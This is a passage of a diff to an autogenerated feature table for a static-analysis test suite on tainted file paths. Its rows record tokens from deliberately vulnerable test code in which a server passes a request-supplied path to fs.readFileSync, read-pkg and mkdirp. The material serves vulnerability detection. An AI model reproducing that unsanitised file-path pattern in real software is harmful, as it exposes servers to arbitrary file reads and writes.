readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | CalleeFlexibleAccessPath | readPkg.readPackageSync | | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | InputAccessPathFromCallee | 0.cwd | | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | InputArgumentIndex | 0 | @@ -10205,6 +81732,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:62:43:62:46 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:16 | pkgPromise | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:16 | pkgPromise | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:16 | pkgPromise | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:16 | pkgPromise | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:16 | pkgPromise | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:56 | pkgProm ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:56 | pkgProm ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:56 | pkgProm ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:56 | pkgProm ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:7:63:56 | pkgProm ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:26 | readPkg | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:26 | readPkg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:26 | readPkg | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:26 | readPkg | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:26 | readPkg | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:43 | readPkg ... geAsync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:43 | readPkg ... geAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:43 | readPkg ... geAsync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:43 | readPkg ... geAsync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:43 | readPkg ... geAsync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | exceptional return of readPkg ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | exceptional return of readPkg ... path}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | exceptional return of readPkg ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | exceptional return of readPkg ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | exceptional return of readPkg ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | readPkg ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | readPkg ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | readPkg ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | readPkg ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:20:63:56 | readPkg ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:28:63:43 | readPackageAsync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:28:63:43 | readPackageAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:28:63:43 | readPackageAsync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:28:63:43 | readPackageAsync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:28:63:43 | readPackageAsync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | CalleeFlexibleAccessPath | readPkg.readPackageAsync | | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | calleeImports | read-pkg | @@ -10214,6 +81776,21 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:63:45:63:55 | {cwd: path} | receiverName | readPkg | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:48 | cwd | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:48 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:48 | cwd | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:48 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:48 | cwd | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:63:46:63:54 | cwd: path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | CalleeFlexibleAccessPath | readPkg.readPackageAsync | | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | InputAccessPathFromCallee | 0.cwd | | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | InputArgumentIndex | 0 | @@ -10224,12 +81801,76 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:63:51:63:54 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:12 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:12 | mkdirp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:12 | mkdirp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:12 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp ... kdirp") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp ... kdirp") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:7:66:32 | mkdirp ... kdirp") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:22 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:22 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | exceptional return of require("mkdirp") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | exceptional return of require("mkdirp") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | exceptional return of require("mkdirp") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | require("mkdirp") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | require("mkdirp") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:66:16:66:32 | require("mkdirp") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:66:24:66:31 | "mkdirp" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:4 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:4 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:17 | http.createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:67:17 | http.createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:1:73:2 | http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:6:67:17 | createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:6:67:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:6:67:17 | createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | mkdirp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | mkdirp | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | mkdirp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:67:18 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | 'arguments' object of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | exceptional return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | calleeImports | http | @@ -10237,6 +81878,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:19:73:1 | return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:28:67:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:67:33:67:35 | res | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:33:67:35 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:67:33:67:35 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:67:33:67:35 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:67:33:67:35 | res | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:10 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:10 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path = ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, 